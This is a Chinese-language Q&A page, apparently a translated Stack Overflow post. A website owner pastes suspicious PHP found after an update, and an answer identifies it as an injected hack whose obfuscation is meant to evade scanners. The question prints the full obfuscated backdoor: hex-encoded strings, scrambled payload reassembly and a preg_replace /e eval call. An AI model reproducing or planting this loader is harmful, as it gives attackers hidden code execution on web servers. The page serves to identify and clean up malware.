这段代码在PHP中意味着什么?

时间:2014-12-19 10:52:29

标签: php server-side-attacks

更新PHP网站后,我遇到了这段代码。 这没有任何意义。

这可能是什么? 对网站或某事的攻击???

 <?php

if (!isset($GLOBALS["\x61\156\x75\156\x61"]))
 {
 $ua = strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]);
 if ((!strstr($ua, "\x6d\163\x69\145")) && (!strstr($ua, "\x72\166\x3a\61\x31")) && (!strstr($ua, "\x61\156\x64\162\x6f\151\x64")) && (!strstr($ua, "\x6d\157\x62\151\x6c\145")) && (!strstr($ua, "\x69\160\x68\157\x6e\145")) && (!strstr($ua, "\x69\160\x61\144")) && (!strstr($ua, "\x6f\160\x65\162\x61\40\x6d"))) $GLOBALS["\x61\156\x75\156\x61"] = 1;
 } ?><?php
$vwxsajnbcm = 'sfuvso!%x5c%x7825bss%x5c%x785csboe))1%x5c%y74]273]y76]252]y85]256]y6g]257]y86]267]y7x5c%x78257UFH#%x5c%x78!)%x5c%x7825z>>2*!%x5c256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUf+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]248]y83]256]x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;tn+qsvmt+fmhpph#)zbssb!-#}#)fep5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gp25kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y4]275]y7:]268]y7f#<!%<X>b%x5c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>]y8%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5cj0#!%x5c%x782f!**#sfmcnbs+yfeoSFSFGFS%x5c%x7860QUUI&c_UOFHBuofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x787825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%vg%x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%if((function_exists("%x6f%142%x5f%1!<##!>!2p%x5c%x7825!|!*85c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5x7825rN}#QwTW%x5c%x7825hIr%x%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x7825nfd)##Qtpz)#]341]88M4P8]35c%x7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x78>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%xb%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<*65]y31]55]y85]82]y76]62]y3:]84#-:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctu,47R57,27R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7-rr.93e:5597f-s.973:8297f:5297e:56-%x5c%x7878r.985:52976]258]y6g]273]y76]271])-1);} @error_reporting(0); preg_replace("%x2f%50%x2e%52273]y76]258]y6g]273]y76]271]y7d]252%x7822:ftmbg39*56A:>:#+I#)q%x5c%x7825:>:r%x5c%x78255%x5c%x785cSFWSFT%x5c%x>%x5c%x782272qj%x5c%x5c%x7825)7gj6<*id%xx5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%165%x3a%146%x7f_*#fubfsdXk5%x5c%x7860<%x5c%x7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdx7825iN}#-!tussfw)%x5c%x78h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7826-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9#%x5c%x782fq%x5c%x7825>U<#16pjudovg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%xy72]265]y39]274]y85]273]y6gx5c%x7825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c7860msvd}R;*msv%x5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%sfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7875c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd%x5c%x784]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c]248L3P6L1M5]D2P4]D6#<%x5c%x77827K6<%x5c%x787fw6*3qj%x5c%x78257{66~6<&w6<%x5c%x787fw6*CW&)7#)tutjyf%x5c%x7860opjudo7825:-5ppde:4:|:**#ppde#)tutjyf%5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c6f+9f5d816:+946OSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5c%x78256<%%x5c%x782f},;#-#}+;%s)%x5c%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x6:!}7;!}6;##}C;!>>!}W;utpi}Y;7]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x7825)n%x5c%x7825-825<#g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepdoF.%x7825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x5c%x7860TW~UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_bz+sfwjidsb%x5c%x7860bj+upco6057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k825=*h%x5c%x7825)m%x5c)))) { $GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg(pmpusut)tpqssutRe%x5c%x7825)Rd%x#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x78osvufs}w;*%x5c%x787f!>>%x5c%x75c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x78!}{;)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%257>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x782x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<%x5c%x7825!*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x782]81#%x5c%x782f#7e:5594%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvrf{jt)!gj!<*2bd%x5c%x7825-#1G8X6<#o]o]Y%x5c%x78257;5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x%x5c%x7824<%x5c%x78e%x5c%x7%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323z#%x5c%x785cq%x5c%x78257%x5c%x782f7#@#7%x5c%x782f7^#iubq#%xy7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7820hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x787863%x74%141%x72%164") && (!isset($GLOBALS["%x61%156%x75%156%x61"]fbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#8{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x7822l:!}V;3>2b%x5c%x7825!<*qp%x5c%x71*!%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x76*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78y<Cb*[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825b825-*.%x5c%x7825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]567860cpV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x7824-%x5c%x7824-!%utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%25!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fmjgAmqnj!%x5c%x782f!#0#)idubn%x5c%x786x5c%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x78{hnpd!opjudovg!|!**#j{hnpd]452]88]5]48]32M3]317]445]212]4tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;5tww**WYsboepn)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x5P6]36]73]83]238M7]381]211M5]67%x7825j,,*!|%x5c%x7824-55%x61%160%x28%42%x66%152%x66%147%x67%42%x2c%163%x74%162%85-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e27rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5j>1<%x5c%x7825j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!~!ds822!pd%x5c%x7825)!gj}Z;h!o:|:**t%x5c%x7825)m%x5c%x7!>!}%x5c%x7827;!>>>!}_;gvc%x5c%x7825}<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*Xbek!~!<b%x5c%x7825%x5c%x787f!5c%x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x52]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<5c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!#]y76]277]!%x5c%x7825mm!>!#]y81]%x7825:osvufs:~:<*9-1-r%x5c%x782y74]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!>!#]x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>27!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7O%x5c%x7822#)fepmqyfAW~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tus%x7825):fmji%x5c%x7878:<##:>:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpdov{h19275j{hnpd19275fu*qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5c%x78!%x5c%x78242178}527}88:}334}472%x5c%x7824<!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j8Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878825>j%x5c%x7825!<**3-!OVMM*<%x22%51%x29%51%x29%73", NULL); }c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%x5c%%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%xx5c%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfic%x7825kj:!>!#]y3d]51]y35]256]y76]72]y3d]5!tus%x5c%x7860sfqmbdf)%x5c%x7%x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<%x29%57%x65","%x65%166%x61%154%x2T-%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x%x5c%x7825)utjm!|!*5!%x5c%x7827j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*ofmy5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%x5]78]K5]53]Kc#<%x5c%x7825tpz!>!#]D68b%x5c%x7825mm)%x5c%x7825%x5c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x78d>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:osvufs:~928>>%x5c24Ypp3)%x5c%x7825cB%x5c%AZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R25,d7R17,67R37,7u%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7825G]y6d]281Ld]245]K2]285]!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%x7825j>1<%x5825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%xc%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%xKe]53Ld]53]Kc]55Ld]55#*5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{7*&7-n%x5c%x7825)utjm6<%x5c%x787fwx7825>j%x5c%x7825!*3!%x5c%x7827x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%xy81]265]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]y33]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j1]y35]274]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x78y84]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5c%x7825tmw!>!#]7825b:<!%x5c%x7825c:>%x5c%x7825s:%x5]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x%x7824-%x5c%x7824*<!%x5c%x7824-%x5c%x7824gps)%x5c%x782%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x5c%x7825)+opjudovg+)!gj+{e%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f]273]y76]271]y7d]252]7860%x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#bmgoj{h1:|:*mmvo:>:iuhofm%x5c%x%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|:!ftmf!}Z;^nbsbq%x5c%x782q%x5c%x7825}U;y]}R;2]},;osvufs}24)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W824-%x5c%x7824!>!fyqmpef)#%x5c%x7824*<!%x5825!<*::::::-111112)eobs%x5c%x7860un>qp%x5c%x7825!|Z~8%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%1y84]275]y83]273]y76]277#<%x5c%x7825t2w>#]256<pd%x5c%x7825w6Z6<.3%&;ftmbg}%x5c%x787f;!%x5c%x7860ufldpt}X;%x5c%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6e%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd7]278]225]241]334]368]322]3]364]6]283]427]36]373x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj5-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x78&w6<%x5c%x787fw6*CW&)7gj6<.[A%x827&6<*rfs%x5c%x78257-K)fujs%x5c%x7872-4-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>25c*W%x5c%x7825eN+#Qi%x5c%x75c%x7825)}k~~~<ftmbg!osvufs!|ftmf!~<**5)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47]67y]37]88y]2%x5c%x7827doj%x5c%x78256<%x45]43]321]464]284]364]6]234]342]58]24]31#-%x5c%x7825tdz*W~%x5c%x7824<!%x5c%x7825o:!>D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D21%76%x21%50%x5c%x7825$n){return chr(ord($nc%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg/(.*)/epreg_replacewehsderyhp';
$ocskvyfdqx = explode(chr((235 - 191)) , '818,35,4175,64,3243,58,10019,21,1481,56,7033,33,9024,59,5326,57,1686,59,9997,22,6700,49,9235,48,957,43,2373,61,9124,24,3546,52,6656,44,4065,66,7902,34,4455,34,3502,44,7578,38,9473,37,3774,22,4735,58,84,22,5432,56,3405,49,6749,60,2571,34,1646,20,9331,57,3678,68,3923,58,7256,68,6588,68,530,48,1084,48,1745,24,2605,28,4959,49,9839,27,9193,42,8579,38,1666,20,5865,57,128,44,2749,63,6984,49,9442,31,7851,51,2900,29,5164,55,9168,25,2180,68,230,39,5601,37,9148,20,3375,30,5550,26,2057,49,9739,38,9580,67,7936,31,6407,67,3598,58,9388,54,6122,48,6528,21,7155,52,7124,31,7642,45,9510,70,8087,65,5107,26,2633,24,780,38,8351,44,300,44,3746,28,6170,21,4386,25,4548,64,8617,42,2472,70,6944,40,4025,40,8971,53,853,23,4297,38,578,30,3156,28,269,31,5008,34,4131,44,3301,32,2689,60,1270,42,3112,44,608,29,3874,49,5703,29,425,52,1170,68,6317,48,3184,37,8812,25,1623,23,8680,60,2812,20,6809,64,7427,68,1572,21,6256,61,8740,31,2657,32,8524,55,8495,29,6083,39,1132,38,4664,47,5638,65,7519,59,2029,28,1359,45,2991,52,637,40,4335,51,8837,31,8771,41,3454,48,5042,65,4793,69,5922,55,2106,27,8659,21,6031,52,8206,63,9083,41,42,42,404,21,2133,47,5999,32,9777,62,2929,62,1593,30,5576,25,3221,22,6227,29,1846,69,4612,52,5796,69,9923,27,6365,42,5977,22,1537,35,8305,46,4711,24,724,56,1312,47,2832,68,1029,55,6915,29,677,47,477,53,5303,23,8449,46,8395,54,5488,62,4239,58,8929,42,6873,42,8152,54,7495,24,1820,26,9711,28,876,53,2314,59,6474,54,6191,36,2248,66,929,28,7207,49,1915,70,5219,54,4862,47,1404,54,5383,49,3656,22,1985,44,7324,34,4909,50,9950,47,2434,38,2542,29,7616,26,7828,23,1769,51,4489,59,7066,58,1000,29,9283,48,5273,30,5133,31,9866,57,0,42,7967,50,3796,51,5732,64,9647,64,4411,44,7752,37,8269,36,7789,39,7687,65,10040,66,106,22,3043,69,3847,27,7358,69,8868,61,3333,42,344,60,1458,23,3981,44,172,58,8017,70,1238,32,6549,39');
$niqesrdxdn = substr($vwxsajnbcm, (32536 - 22430) , (34 - 27));

if (!function_exists('zzrfhvkcwo'))
 {
 function zzrfhvkcwo($znzwjxpcyc, $lfafkymhqq)
  {
  $xnhcrqpkcp = NULL;
  for ($gznncvjdur = 0; $gznncvjdur < (sizeof($znzwjxpcyc) / 2); $gznncvjdur++)
   {
   $xnhcrqpkcp.= substr($lfafkymhqq, $znzwjxpcyc[($gznncvjdur * 2) ], $znzwjxpcyc[($gznncvjdur * 2) + 1]);
   }

  return $xnhcrqpkcp;
  };
 }

$zwqshkkfti = "\x20\57\x2a\40\x6b\170\x70\153\x66\170\x64\171\x64\142\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\70\x32\55\x31\64\x35\51\x29\54\x20\143\x68\162\x28\50\x34\65\x30\55\x33\65\x38\51\x29\54\x20\172\x7a\162\x66\150\x76\153\x63\167\x6f\50\x24\157\x63\163\x6b\166\x79\146\x64\161\x78\54\x24\166\x77\170\x73\141\x6a\156\x62\143\x6d\51\x29\51\x3b\40\x2f\52\x20\144\x76\155\x63\147\x72\163\x76\153\x68\40\x2a\57\x20";
$fqlqhefvbx = substr($vwxsajnbcm, (52826 - 42713) , (57 - 45));
$fqlqhefvbx($niqesrdxdn, $zwqshkkfti, NULL);
$fqlqhefvbx = $zwqshkkfti;
$fqlqhefvbx = (686 - 565);
$vwxsajnbcm = $fqlqhefvbx - 1; ?> 

1 个答案:

答案 0 :(得分:5)

是。这是一个黑客。随机生成的变量名称等都会混淆内容并使搜索变得不那么容易使用扫描程序 - 代码会做同样的事情,但在每个站点上使用不同的变量名等,所以你不能只需搜索特定的字符串即可找到它。 Here's another example of what looks like the same hack

您应该删除代码,但当然不会删除任何允许黑客首先将其放在那里的漏洞,因此您需要审核该网站并进行修复。这超出了这里的答案范围,也超出了Stack Overflow的主题范围。 (您可以在http://security.stackexchange.com上获得更多运气,但在发布之前检查their help centre ...)

这也是一个WordPress网站吗?我会仔细遵循FAQ "My Site Was Hacked"中的所有建议。